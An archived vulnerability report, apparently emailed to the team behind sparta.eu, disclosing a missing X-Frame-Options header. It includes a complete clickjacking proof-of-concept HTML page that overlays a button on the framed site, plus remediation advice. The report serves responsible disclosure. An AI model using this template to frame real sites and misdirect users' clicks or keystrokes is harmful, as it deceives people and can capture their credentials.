16 Apr
2022
16 Apr
'22
5:44 p.m.
Dear Team,
I am Vitesh Walunj working as a security researcher and I found a bug in
your site report of bug is as follows :
a) Vulnerability name : clickjacking
b) Vulnerability Description :
Clickjacking (User Interface redress attack, UI redress attack, UI
redressing) is a malicious technique of tricking a Web user into clicking
on something different from what the user perceives they are clicking on,
thus potentially revealing confidential information or taking control of
their computer while clicking on seemingly innocuous web pages.
The server didn't return an X-Frame-Options header which means that this
website could be at risk of a clickjacking attack. The X-Frame-Options HTTP
response header can be used to indicate whether or not a browser should be
allowed to render a page in a <frame> or <iframe>. Sites can use this to
avoid clickjacking attacks, by ensuring that their content is not embedded
into other sites.
This vulnerability affects Web Server.
c) Steps to reproduce :
1. Copy URL of website and paste it in clickjacking code
2. This is sample code
Create a new HTML file
put <iframe src="https://sparta.eu/" id="frame1"
width="100%"
height="100%" >
3. Open html file with another browser and click on click here and see it
is redirected to bing.com .
d) POC :
I have attached image as well as code of clickjacking :
<html>
<head>
<title>Clickjack test page</title>
</head>
<style>
#myBtn{
z-index: 999;
position: absolute;
top: 100px;
right: 50px;
color: white;
background-color: red;
}
</style>
<body>
<!-- <h1> A Sample Test Page </h1>
<p>https://sparta.eu/</p>
<p>Avoid random clicks </p> -->
<div style="z-index:-9999; position:absolute;top:0; left:0;width: 70%;
height:70%">
<iframe src="https://sparta.eu/" width="100%"
height="100%" >
</iframe></div>
<div align="right" style="position:absolute; top:1; left:0; z-index:1;
width: 70%;height:60%; text-align:left;">
<a href="
https://www.bing.com/?toWww=1&redig=D1C96AD6DC434FA59D3D2AC05339EA9B&qu…
target="_blank"><button id="myBtn"> click
here</button></a>
<div id="myModal" class="modal">
<!-- Modal content -->
</div>
</body>
</html>
e) Solution :
There are two main ways to prevent clickjacking:
Sending the proper X-Frame-Options HTTP response headers that instruct the
browser to not allow framing from other domains
Employing defensive code in the UI to ensure that the current frame is the
most top level window
Most modern Web browsers support the X-Frame-Options HTTP header. Ensure
it's set on all web pages returned by your site (if you expect the page to
be framed only by pages on your server (e.g. it's part of a FRAMESET) then
you'll want to use SAMEORIGIN, otherwise if you never expect the page to be
framed, you should use DENY. ALLOW-FROM allows specific websites to frame
the web page in supported web browsers).
f) Impact:
By using Clickjacking technique, an attacker hijacks click's meant for one
page and routes them to another page, most likely for another application,
domain, or both.
Using a similar technique, keystrokes can also be hijacked. With a
carefully crafted combination of stylesheets, iframes, and text boxes, a
user can be led to believe they are typing in the password to their email
or bank account, but are instead typing into an invisible frame controlled
by the attacker.
g) References:
*https://hackerone.com/reports/405342
<https://hackerone.com/reports/405342>https://hackerone.com/reports/8724
<https://hackerone.com/reports/8724>*
h)POC: Attached Below html file.
With Kind regards ,
Vitesh Walunj